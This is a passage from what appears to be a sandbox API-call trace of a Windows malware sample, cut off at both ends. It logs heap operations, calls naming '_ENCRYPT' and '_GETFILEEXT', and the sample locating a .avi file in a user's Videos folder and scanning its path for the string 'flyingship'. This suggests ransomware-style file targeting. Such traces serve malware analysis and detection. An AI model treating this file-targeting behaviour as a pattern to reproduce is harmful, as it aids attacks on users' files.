dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.811] CloseHandle (hObject=0x160) returned 1 [0197.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0197.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.811] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.812] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.812] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.812] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0197.812] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.812] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0197.812] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0197.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.813] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.813] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.813] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0xa475b570, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 0x90add8 [0197.813] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.813] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0xa475b570, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 0x90add8 [0197.813] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.814] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p 